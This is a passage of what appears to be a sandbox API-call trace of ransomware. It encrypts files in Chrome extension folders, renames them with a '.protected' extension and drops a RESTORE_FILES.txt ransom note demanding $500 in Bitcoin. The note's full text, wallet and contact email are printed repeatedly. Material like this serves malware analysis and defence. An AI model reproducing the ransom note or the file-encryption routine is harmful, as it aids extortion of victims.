pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\RESTORE_FILES.txt") returned 163 [0080.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.995] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.995] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.996] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.996] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.996] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.996] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.996] CloseHandle (hObject=0x164) returned 1 [0080.996] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.996] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0080.996] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0080.996] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0080.996] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0080.996] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0080.996] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB") returned 148 [0080.996] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0080.996] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0080.996] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\*") returned 150 [0080.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.997] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.997] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.997] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.997] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.997] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\.") returned 150 [0080.997] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.997] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.997] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.997] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.997] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.997] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\..") returned 151 [0080.997] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.997] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.997] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.997] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.997] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.997] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.997] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json") returned 162 [0080.997] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.997] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.997] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.997] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json") returned 162 [0080.998] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json") returned 162 [0080.998] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json") returned 162 [0080.998] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.998] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0080.999] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.999] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0080.999] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.000] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.000] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.000] CloseHandle (hObject=0x168) returned 1 [0081.000] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.protected") returned 172 [0081.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0081.001] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.001] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.001] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 166 [0081.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.001] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.001] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.002] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.002] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.002] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.002] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.002] CloseHandle (hObject=0x164) returned 1 [0081.002] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.002] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0081.002] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0081.002] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0081.002] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0081.002] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0081.002] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es") returned 145 [0081.002] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0081.003] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0081.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\*") returned 147 [0081.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.003] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.003] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.003] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.003] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.003] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\.") returned 147 [0081.003] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.003] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.003] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.003] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.003] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.003] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.003] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\..") returned 148 [0081.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.003] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.003] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.003] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.003] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.003] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.003] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.003] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json") returned 159 [0081.003] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.004] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.004] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.004] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json") returned 159 [0081.005] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json") returned 159 [0081.005] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json") returned 159 [0081.005] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.005] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2b8, lpOverlapped=0x0) returned 1 [0081.006] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd48, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.006] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2b8, lpOverlapped=0x0) returned 1 [0081.007] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.007] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.007] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.007] CloseHandle (hObject=0x168) returned 1 [0081.007] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.protected") returned 169 [0081.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.protected")) returned 1 [0081.008] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.008] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.008] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\RESTORE_FILES.txt") returned 163 [0081.008] CreateFileW 